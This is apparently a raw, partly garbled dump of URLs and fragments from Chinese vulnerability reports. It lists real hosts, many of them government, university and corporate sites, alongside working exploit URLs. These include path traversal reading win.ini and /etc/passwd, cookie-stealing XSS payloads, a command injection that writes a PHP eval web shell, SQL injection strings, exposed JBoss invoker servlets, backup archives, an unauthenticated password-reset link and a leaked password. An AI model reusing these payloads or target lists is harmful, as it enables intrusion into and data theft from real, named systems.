http://game.9you.com/ http://gt.9you.com/ http://hk.9you.com/ http://jb.9you.com/ http://idea.9you.com/ http://kx.9you.com/ http://lh.9you.com/ http://albumupload.9you.com/beautyalbum.php?curpid=22的反射xss,curpid过滤了单双引号。用HTML http://58.254.18.2:8080/manager/html http://cs.sina.com.hk http://cs.sina.com.hk/faq/sinahelp414.html http://221.1.104.11:8011/ExtWebModels/WebFront/ShowProject.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowProject.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowProject.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowProject.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowProject.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowProject.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowProject.aspx?id= http://member.ibicn.com/ http://www.wcfy.gov.cn/scjg/manage_login.asp http://www.ycyx.gov.cn/scjg/manage_login.asp http://www.gyjjjyzx.com/scjg/manage_login.asp http://www.lzquansheng.com/scjg/Admin_Index.asp http://www.scsdds.com/scjg/Manage_Login.asp http://www.pxjgj.com/scjg/Manage_Login.asp http://www.ntgh.gov.cn/dz/list.aspx?ks=b2_1 http://salon.hexun.com/BroadCast/admin/BroadCastList.aspx?activity=1 http://ffp.scal.com.cn/FFPNewWeb/Mileage/FlightRedeemRuleQuery http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule http://ffp.scal.com.cn/FFPNewWeb/Mileage/FlightRedeemRuleQuery http://www.zblogcn.com/zblogphp/ http://218.29.79.78/recruit/school/schoollist.aspx?zone=200810291356051771156000 http://218.29.79.78/recruit/policy/default.aspx?type=1&page=1 http://218.29.79.78/recruit/school/schoollist.aspx?page=1&zone=200810291356051771156000 http://218.29.79.78/senior/policy/?type=01 http://218.29.79.78/recruit/policy/?type=1 http://218.29.79.78/senior/policy/default.aspx?type=01 http://www.wooyun.org/bugs/wooyun-2015-097271/trace/75422c0616bb8a959bd6583893ee0136 http://s.cnpc.com.cn http://s.cnpc.com.cn/index.php?app=blog&mod=Personal&act=post&blog_id=685&edit=1 http://s.cnpc.com.cn/index.php?app=blog&mod=Personal&act=post http://wooyun.org/bugs/wooyun-2014-076556 http://bbs.ubox.cn/index.php http://food.sc.sina.com.cn/ codehttps://219.143.209.76/ site:news.jlu.edu.cn http://news.jlu.edu.cn/new/?mod=admin&act=mend&menu=zt&id=31 http://news.jlu.edu.cn/new/2010_files/upload/zt20150226150702.php http://www.smmzj.gov.cn/Article_Search.aspx?KeyWord=1&pageNow=1 http://www.smmzj.gov.cn/smmzj008/htmledit/admin/default.asp http://de.appchina.com ttp://de.appchina.com/wp-config.php.bak http://www.jpi.cn/show.php?id=182&channel=2&class=30 http://www.jpi.cn/show.php?id=182&channel=2&class=30 http://www.donghaifunds.com/ http://180.166.204.253:8080/index.php/ http://data.xiezilou.com(http://bj.office.sina.com.cn) http://data.xiezilou.com/index.php/?c=building&a=postScore& http://vdian.vip.58.com/info/delete/要删除的IDccateId http://vdian.vip.58.com/info/delete/21113736622083 http://vdian.vip.58.com/info/post http://125.93.53.82:9988/login.html http://125.93.53.82:9988/login.html http://www.itoone.com/ http://www.datacarrier.cn/ www.cqnagt.gov.cn/www.rar http://support.m41s.com http://cs.m41s.com http://data.m41s.com http://cx.zjzs.net/exam/XYKS201501/ http://cx.zjzs.net/exam/MSZYCJ2015 http://chl.yinxunpay.com/login.action http://wooyun.org/bugs/wooyun-2015-090961 http://chl.fjwysw.com/login.action http://info.tclcomm.com/ http://info.tclcomm.com/email_download.asp?id=1 http://info.tclcomm.com/email_download.asp?id=3 https://121.201.96.96/.svn/entries https://122.13.147.96/.svn/entries http://183.56.157.202:8088/phpinfo.php http://w4.m41s.com/upgrade.php http://w5.m41s.com/index.php http://w4.m41s.com/index.php http://w3.m41s.com/index.php http://w2.m41s.com/index.php http://w.m41s.com/index.php http://support.m41s.com http://cs.m41s.com http://data.m41s.com http://**.**.**/Login.aspx www.yingtanfdc.com/default.aspx?tname=59\NewsText&hrefld=4565&ptCode=21 http://lsp.baidu.com/actions/virtual_location/script/sceneCreate.php http://m.aili.com/setting/feedback/ http://**.**.**/back/Cjy_login.do https://pay.suning.com/epp-epw/useraccount/compatible-login!toSuning.action?targetUrl=http://www.qq.com http://job.csdn.net/ http://biz.csdn.net/job/CreateJob?jobid=82707&?type=save http://pr.csdn.net/enterprise/ent_home?orgid=435363 http://vps.myxinnet.com/html/Login.aspx http://bbs.pigai.org/ http://biz.csdn.net/ http://biz.csdn.net/resume/index?csdnusername=***************&jobcvid=201532 http://job.csdn.net/Public/GetFile?FileID=2337 http://www.ykmzj.gov.cn/news.php?sid=12 http://zm.lenovo.com/launcher/profile.php?themeid=33799&version=4 http://zm.lenovo.com/launcher/data/attachment/theme/imgsrc/1425056661/example/testing.php http://www.skyexam.com/MemberQualificationManage/StudentModify.aspx?PK=121115000007043 http://ffp.scal.com.cn/FFPNewWeb/Mileage/SegmentMilesQuery http://ffp.scal.com.cn/FFPNewWeb/Mileage/QuerySegmentMiles http://ffp.scal.com.cn/FFPNewWeb/Mileage/SegmentMilesQuery http://paojiao.com/user/search.html?userName=s kingdomdeMacBook-Pro:sqlmap-dev http://api.himoca.com/moca/System/Info http://sqlmap.org http://www.aaisme.com,点首页的登录处的找回密码。这里以admin为例。 http://124.133.3.232:8080/Login.aspx https://next.sfn.cn/ https://admin.sfn.cn kingdomdeMacBook-Pro:sqlmap-dev http://m.himoca.com/about2.asp?id=3 http://sqlmap.org http://www.slswsj.com http://www.slswsj.com/xwxx.asp?maxid=6&actionid=480 http://wenku.baidu.com/view/e4bc0882dd3383c4ba4cd20e.html https://202.127.1.85 http://wenku.baidu.com/view/a0c5eac98bd63186bcebbc08.html https://159.226.132.3 http://219.138.244.246:8080/ http://113.59.33.166:8080/ http://123.127.75.182:8080/ http://113.214.20.148:8080/ http://183.129.232.103:8080/ http://219.138.141.252:8080/ http://42.202.133.35:8080/ http://116.228.81.22:8080/ http://112.14.188.94:8080/ http://112.113.97.245:8080/ http://218.205.123.2:8080/ http://183.246.161.141:8080/ http://123.127.75.181:8080/ http://120.199.1.154:8080/ http://219.237.9.201:8080/ http://115.29.170.138:8080/ http://59.50.104.92:8080/ http://218.205.127.17:8080/ http://120.197.66.230:8080/ http://111.1.2.83:8080/ http://218.202.46.58:8080/ http://113.98.52.221:8080/ http://119.80.113.3:8080/ http://117.27.88.5:8080/ http://222.132.83.246:8080/ http://111.1.2.82:8080/ http://218.21.69.20:8080/ http://117.40.91.101:8080/ http://219.232.86.3:8080/ http://119.7.222.196:8080/ http://221.10.132.186:8080/ http://125.65.207.34:8080/ http://218.24.45.204:8080/ http://221.2.40.236:8080/ http://58.42.241.49:8080/ http://183.221.242.39:8080/ http://111.1.2.84:8080/ http://222.38.248.60:8080/ http://122.226.29.142:8080/ http://218.89.39.199:8080/ http://61.164.202.218:8080/ http://110.249.221.236/CWDoc/Login/LogOn http://bkjyw.swu.edu.cn/ http://bkjyw.swu.edu.cn/index.php/employ/listemp.html?selectedcate=6 password:baoguang2012/jackson2012/ http://www.ctflife.com/platinum/platinum/ http:/// http://cx.zjzs.net/exam/SSYJS2015/ http://210.43.126.80:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://211.64.205.214/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://210.43.126.80:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://218.75.27.177/Gmis/pygl/sjhd.aspx?xh=07102822061 http://101.76.99.20/Gmis/pygl/sjhd.aspx?xh=07102822061 http://202.203.225.17:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://61.187.179.68:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://210.43.126.80:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/sjhd.aspx?xh=07102822061 http://www1.53kf.com/impl/rpc_company_info_minkh.php http://www2.53kf.com/impl/rpc_company_info_minkh.php http://www3.53kf.com/impl/rpc_company_info_minkh.php http://www6.53kf.com/impl/rpc_company_info_minkh.php http://www7.53kf.com/impl/rpc_company_info_minkh.php http://www8.53kf.com/impl/rpc_company_info_minkh.php http://www9.53kf.com/impl/rpc_company_info_minkh.php http://www10.53kf.com/impl/rpc_company_info_minkh.php http://www11.53kf.com/impl/rpc_company_info_minkh.php http://www12.53kf.com/impl/rpc_company_info_minkh.php http://www13.53kf.com/impl/rpc_company_info_minkh.php http://www15.53kf.com/impl/rpc_company_info_minkh.php http://www16.53kf.com/impl/rpc_company_info_minkh.php http://www17.53kf.com/impl/rpc_company_info_minkh.php http://www22.53kf.com/impl/rpc_company_info_minkh.php http://www28.53kf.com/impl/rpc_company_info_minkh.php http://www29.53kf.com/impl/rpc_company_info_minkh.php http://www30.53kf.com/impl/rpc_company_info_minkh.php http://www33.53kf.com/impl/rpc_company_info_minkh.php http://www36.53kf.com/impl/rpc_company_info_minkh.php http://www40.53kf.com/impl/rpc_company_info_minkh.php http://www41.53kf.com/impl/rpc_company_info_minkh.php http://www42.53kf.com/impl/rpc_company_info_minkh.php http://www43.53kf.com/impl/rpc_company_info_minkh.php http://www44.53kf.com/impl/rpc_company_info_minkh.php http://www45.53kf.com/impl/rpc_company_info_minkh.php http://www.seetong.com/ http://202.201.7.35/web/template/web-index.action inurl:/download/download.jsp?filename= www.bd-bank.com.cn/download/download.jsp?filename=1361956542714.txt&filepath=../../../../../../../../../../windows/win.ini http://www.yxccb.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini&filename=1363166087810.xml www.chinaprint.org/download/download.jsp?filename=1361956542714.txt&filepath=../../../../../../../../../../windows/win.ini www.buptpress.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini&filename=1363166087810.xml http://www.wondersoft.cn http://183.62.35.210:8081/gzdtss/Portal.aspx http://183.62.35.210:8081/gzdtss/SCSEXEC/IndexMainPageTab.aspx http://rentcar.7daysinn.cn:3668 http://www.dtzfw.gov.cn/bianjiqi/up/db.cer http://club.v2.net.cn/masterteam/show.php?id=10 http://club.591hx.com http://club.591hx.com/?username=nsfocus http://dzjj.dz169.net http://dzjj.dz169.net/downAction.action?fileName=..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2fetc%2fpasswd存在xss: http://www.aaisme.com//index.php?a=topicInfo&c=school&page=232&topic_id=300 http://www.aaisme.com/index.php?c=school&a=topicInfo&page=1&type=indeX http://www.aaisme.com/mmc.php http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=%C3%CE%CF%EB%C6%F0%BA%BD&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play http://y.qq.com/webplayer/player.html http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=http%3A%2F%2Fcc.stream.qqmusic.qq.com%2FC1000044WSp92MU5AU.m4a%3Ffromtag%3D52 http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://114.251.172.108/default.asp http://me.aaisme.com//index.php/user/updatepassword?uid=8237642&newpass=123456789 user.php/photo/index?uid=27940599 www.ccu.edu.tw的分站 http://secretar.ccu.edu.tw/secretar_web/mw/news_content.php?nid=39 http://inoffice.ccu.edu.tw/elitist/elitist_show.php?Elististsubcat_ID=12 http://erp.suning.com.cn/ URL:http://erp.suning.com.cn/epp/detail/publishinfodetail.jsp?pk_message=1003271000000001TMW3&infoTypeName=%D5%D0%B1%EA%D0%C5%CF%A2%B7%A2%B2%BC http://zyxw.dlmu.edu.cn:8080/ZYXWMPA/login/login_logout.do http://mxcms.moxian.com/ http://mxcms.moxian.com/index.php?m=admin&c=index&a=login http://www.npxzfw.gov.cn/www2/twopage/commonlists.jsp?punid= http://www.npxzfw.gov.cn/www2/twopage/commoncharging.jsp?deptUnid=965848141C14AF145670392654DDDABB http://www.npxzfw.gov.cn/www2/userpanel/myInfo_dept_list.jsp?deptunid=8E3909F18E9325C20161BFF0A6CB3F73 http://www.thermos.com.cn/product.php?curr_page=product_detail&id=157 http://www.thermos.com.cn/admin/privilege.php http://www.douguo.com http://ot.wap.sogou.com/web/admin/admin.jsp http://210.43.126.80:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://218.75.27.177/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://101.76.99.20/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://211.64.205.214/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://202.203.225.17:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://61.187.179.68:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://210.43.126.80:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://218.75.27.177/Gmis/dtjygl/dzbadd.aspx?id=1 http://101.76.99.20/Gmis/dtjygl/dzbadd.aspx?id=1 http://211.64.205.214/Gmis/dtjygl/dzbadd.aspx?id=1 http://202.203.225.17:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://61.187.179.68:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://101.76.99.20/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://202.203.225.17:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://gongan.sdkd.net.cn/ http://210.43.126.80:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://202.203.225.17:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://218.75.27.177/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://yjsy.wmu.edu.cn:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://101.76.99.20/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://61.187.179.68:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://yjsy.wzmc.edu.cn:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://211.64.205.214/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://210.43.126.80:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://202.203.225.17:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://218.75.27.177/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://101.76.99.20/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://61.187.179.68:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://211.64.205.214/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://210.43.126.80:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://61.187.179.68:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://www.kjc.sdnu.edu.cn:80/qiantai/twopagetwo.aspx?InforId=9b1a5c45-118b-4a21-87e0-b0c31bff16b4 http://news.7k7k.com/gf/ http://wm.baidu.com","src":"","type":2,"title":"","isUpload":"0","imgWidth":"960","imgHeight":"60","imgUrl":"http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x60.jpg","image":[10009,10007,10010,10013,10006,10015,10014],"tip":0,"linkUrl":"http://wm.baidu.com","imgTitle":"","des1":"","des2 www.imooc.com http://tushu.tzjyxx.gov.cn/ http://124.133.235.142/mobile/m_login.aspx http://paojiao.com/pages/user/private_msg_send.jsp?receiverId=10&niceName=ahswf&avatar= http://scm.tmt.tcl.com:8080/tclscm/login.action http://scm.tmt.tcl.com:8080/tclscm/cmd.jsp http://www.jxdcw.com/ajax/2011/gethouselist.ashx?callback=jsonp1421141529088&key=a http://www.snnu.edu.cn/ http://211.snnu.edu.cn/htdocs.rar http://alu.snnu.edu.cn/htdocs.rar http://ef-al.snnu.edu.cn/htdocs.rar http://www.snnu.edu.cn/snnu.tar.gz http://alu.snnu.edu.cn/htdocs.rar http://1.93.0.215:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp# http://210.43.126.80:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://211.64.205.214/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://210.43.126.80:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://211.64.205.214/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://weixin.zjol.com.cn/weixin/pages/ZjolMembers/list.do http://210.43.126.80:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://218.75.27.177/Gmis/pygl/wxydbgsh.aspx?xh=1 http://101.76.99.20/Gmis/pygl/wxydbgsh.aspx?xh=1 http://211.64.205.214/Gmis/pygl/wxydbgsh.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://210.43.126.80:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://211.64.205.214/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/wxydbgsh.aspx?xh=1 http://211.64.205.214/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://www.mobline.cn/toIndex.action http://210.43.126.80:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://218.75.27.177/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://101.76.99.20/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://211.64.205.214/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://202.203.225.17:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://61.187.179.68:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://210.43.126.80:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://218.75.27.177/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://101.76.99.20/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://211.64.205.214/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://202.203.225.17:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://61.187.179.68:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://218.75.27.177/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://211.64.205.214/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://ir.xmyuzhou.com.cn/s/photo.php?id=3 http://tj.cndr.gov.cn/registry.action http://gs.njfu.edu.cn/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://202.203.225.17:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://218.75.27.177/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://101.76.99.20/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://61.187.179.68:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://210.43.126.80:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://211.64.205.214/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://210.43.126.80:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://202.203.225.17:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://218.75.27.177/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://101.76.99.20/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://61.187.179.68:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://211.64.205.214/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://202.203.225.17:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://101.76.99.20/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 https://zxsl.gov.cn/ https://lyfx.gov.cn/ http://www.jzrongda.com/ http://ww.jzyfmhj.com/www.hnstz.com/wyyp.php?zhiweiid=1 http://www.jz-feihong.com/wyyp.php?zhiweiid=1 http://www.china-wheel.com.cn/wyyp.php?zhiweiid=3 http://www.miaozihao.com/wyyp.php?zhiweiid=36 http://www.jzjgjt.com/wyyp.php?zhiweiid=40 http://test.jzrongda.com/www.jinshanzhiye.com/wyyp.php?zhiweiid=49 http://www.jinghua-food.com/wyyp.php?zhiweiid=3 http://www.hnycdq.com/wyyp.php?zhiweiid=3 http://www.rongtaijm.com/wyyp.php?zhiweiid=1 http://w.hntgglc.com/www.hdlfm.com/wyyp.php?zhiweiid=2 http://www.qyhuangfu.com/wyyp.php?zhiweiid=2 http://ww.hntgglc.com/rtjm/wyyp.php?zhiweiid=1 http://www.hnstz.com/wyyp.php?zhiweiid=1 http://www.jhyjx.com/wyyp.php?zhiweiid=1 http://www.rongtaijieneng.com.cn/wyyp.php?zhiweiid=1 http://4.36009.ygspgs.com/rtjm/wyyp.php?zhiweiid=1 http://www.jznem.com/wyyp.php?zhiweiid=1 http://114.112.173.212:8080/invoker/EJBInvokerServlet http://114.112.173.212:8080/invoker/JMXInvokerServlet http://114.112.173.211:8080/invoker/EJBInvokerServlet http://114.112.173.211:8080/invoker/JMXInvokerServlet http://114.112.173.212:8080/invoker/JMXInvokerServlet system:service=MainDeployer http://www.cmuying.com/about/job.war https://218.76.215.70/ http://210.45.215.10 http://120.33.31.10:8085/wwmis/wzgs/eda.wags.globalAction.search.action?title= http://m.suning.com.cn/login.do http://tmtoa.tcl.com/hrmng/SearchShowFrame.nsf http://www.ftms.com.cn/information/news_detail.php?id=82漏洞页面 http://218.66.111.194/usr!login.action http://www.sxsrf.gov.cn/help/add.aspx http://www.sxsrf.gov.cn/1.asp http://www.sxsrf.gov.cn/userfiles/511864473244/2013.asp http://www.sxsrf.gov.cn/configuration/system/selectuserpic.aspx?FileType=user_pic http://www.sxsrf.gov.cn/configuration/system/selectuserpic.aspx?FileType=user_pic http://222.216.226.75:9068/userLogin.action,如图所示,来到了系统管理登陆界面 http://wooyun.g.178.com/main.php?act=album&action=edit&album_id=43730 http://www.ao.fudan.edu.cn/fudan/studentLogin!index.action http://www.1hai.cn/storeguide.aspx http://218.106.133.136/ChangePWD.aspx?account= http://218.106.133.136 http://bwch.hnu.cn/index!toIndex.action http://jhsbgf.com/index.action http://nandu.media.baidu.com/ http://nandu.media.baidu.com inurl:cpzs.asp?ProClass= http://www.njrhlqkj.com//manage/message.asp http://www.njhpzkb.com//manage/message.asp http://njxiangyu.com//manage/message.asp http://www.hahjzs.com//manage/message.asp http://www.yhwxjy.cn//manage/message.asp http://www.njyll.cn//manage/message.asp http://www.xinfeng168.net//manage/message.asp http://ge.baidu.com/wse.tar http://ge.baidu.com/index.php/wse/callBack/DiffReCrawlCallBack/?evaluation_id=7072&taskId=7993&diff_num=1;echo%20xxx%27%3C?php%20eval%28$_POST[c]%29;?%3E%27%20%3E%20/home/work/wse-platform/bin/wse/x.php;echo%201%23 http://ge.baidu.com/index.php/wse/patchPageShow/contEvalPageShow?evaluation_id=111&label_env_id=111&query_name=aaa%27or%201=1%20limit%201%23 http://www.xiaodian.com/pc/download http://news.ename.cn/yumingjiaoyi_20150118_97290_1.html xiaodian.com/.cn http://www.xiaodian.com/h5/im/im?imver=1.2&name=mmmm&show_header=shop#chat/130oicm http://www.xiaodian.com/h5/im/im?imver=1.2&name=mmmm&show_header=shop#chat/130oicm http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career-online/sd_zjc_career_online_action.aspx?id=04fc0db8-f297-45fd-9cef-62dd2154a299 http://security.hnagroup.com http://security.hnagroup.com/wordpress/wp-login.php?redirect_to=http%3A%2F%2F114.251.242.148%2Fwordpress%2Fwp-admin%2Fpost-new.php http://security.hnagroup.com/网站360安全检测平台 http://webscan.360.cn/index/checkwebsite/url/security.hnagroup.com http://202.119.249.13 http://icourse.lygsf.cn http://221.224.254.234 http://202.119.160.175 http://202.119.160.175/selectCourseInfoOut.action http://221.1.104.11:8011/ExtWebModels/WebFront/ShowProduct.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowProduct.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowProduct.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowProduct.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowProduct.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowProduct.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowProduct.aspx?id= http://wooyun.org/bugs/wooyun-2015-091798中得ssrf可用短连接绕过。 